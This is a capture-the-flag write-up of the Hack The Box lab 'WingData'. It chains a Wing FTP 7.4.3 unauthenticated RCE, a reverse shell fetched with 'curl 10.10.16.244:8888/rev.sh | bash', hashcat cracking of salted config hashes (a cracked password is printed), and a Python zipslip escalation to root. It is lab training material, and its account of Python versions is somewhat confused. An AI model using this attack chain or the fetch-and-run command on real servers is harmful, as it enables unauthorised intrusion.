Myles Nieman
← All writeups

WingData

Overview

WingData is an easy Linux box running Wing FTP Server 7.4.3 on a subdomain discovered through the web portal. The version is vulnerable to an unauthenticated RCE (ExploitDB 52347), landing a shell as the wingftp service user. The server’s XML configuration files store HMAC-SHA256 password hashes salted with :WingFTP; cracking them recovers credentials for a local system user. That user’s home directory contains a backup script run as root that extracts attacker-controlled zip archives — exploitable via CVE-2025-4138 (Python zipslip in Python 3.12+) to write an arbitrary file as root.

Path: Wing FTP 7.4.3 RCE → wingftp service shell → hash cracking from XML config → SSH as local user → zipslip CVE-2025-4138 → root.

Enumeration

A standard nmap scan shows SSH and an Apache web server redirecting to wingdata.htb:

$ nmap -T4 -A 10.129.10.205
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/

HTB spawn card suggesting a zipslip vulnerability for this box

After adding wingdata.htb to /etc/hosts, the web portal’s “Client Portal” button reveals a subdomain: ftp.wingdata.htb.

The wingdata.htb portal exposes ftp.wingdata.htb via the client portal link

Browsing to http://ftp.wingdata.htb shows a Wing FTP Server web interface reporting version 7.4.3.

Foothold — Wing FTP Server Unauthenticated RCE

Wing FTP Server 7.4.3 is vulnerable to an unauthenticated remote code execution flaw documented at ExploitDB 52347. The public exploit confirms the target is vulnerable and accepts a command to execute:

$ python3 exploit.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!

I hosted a reverse shell script and used the exploit to fetch and execute it:

$ nc -lvnp 8081
$ python3 exploit.py -u http://ftp.wingdata.htb -c 'curl 10.10.16.244:8888/rev.sh | bash'

Reverse shell lands as the wingftp service user

The shell arrives as wingftp.

User — Cracking Wing FTP Password Hashes

The Wing FTP data directory contains XML configuration files for both admin accounts and regular FTP users:

wingftp@wingdata:/opt/wftpserver/Data$ ls
1  _ADMINISTRATOR  bookmark_db  settings.xml  ssh_host_ecdsa_key  ssh_host_key

The admin account config at _ADMINISTRATOR/admins.xml contains a SHA-256 hash:

<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>

The user XML files in Data/1/users/ contain hashes for several accounts — maria, steve, wacky, john, and anonymous. Wing FTP salts its hashes with :WingFTP appended to the plaintext before hashing.

Running linpeas confirms the service configuration and helps identify the hash format:

linpeas output on the wingftp shell showing service details

linpeas or manual grep highlighting the salted hash format

Cracking with the correct salt (hashcat mode 1400 — SHA-256 with the password concatenated with the salt string):

$ hashcat -m 1400 -a 0 <hash> /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt --force

One of the user hashes cracks to reveal a password:

!#7Blushing^*Bride5

hashcat successfully cracks one of the Wing FTP user hashes

That password works for SSH access as the corresponding local system user.

SSH login with the cracked credential succeeds

The user flag is in that user’s home directory.

Privilege Escalation — CVE-2025-4138 (Python Zipslip)

Exploring the home directory reveals a backup script that extracts zip archives from an uploads or backup staging location into a destination directory:

Backup script showing zip extraction logic

The script runs as root (via cron or a sudo rule) and uses Python’s zipfile module to extract archives. Python versions before 3.12 reject path-traversal entries in zip files by default, but CVE-2025-4138 describes a bypass allowing the extraction filter to be circumvented even in Python 3.12+, enabling classic zipslip — writing files outside the extraction target directory.

By crafting a zip archive with a path-traversal entry (e.g., ../../root/.ssh/authorized_keys) and placing it in the directory the backup script reads from, the next script execution writes the attacker-controlled content to the traversed path as root.

CVE-2025-4138 zipslip bypass works against the backup script

Dropping an SSH public key into /root/.ssh/authorized_keys via the zipslip completes the escalation, and ssh root@wingdata.htb with the corresponding private key grants a root shell.

Takeaways

  • Wing FTP Server 7.4.3 ships with an unauthenticated RCE that is point-and-shoot with a public PoC — any internet-exposed instance on this version is fully compromised without credentials.
  • CVE-2025-4138 demonstrates that zipslip remains relevant even in modern Python: root-owned scripts that extract attacker-controlled archives without safe extraction patterns are a reliable privilege escalation path regardless of Python version.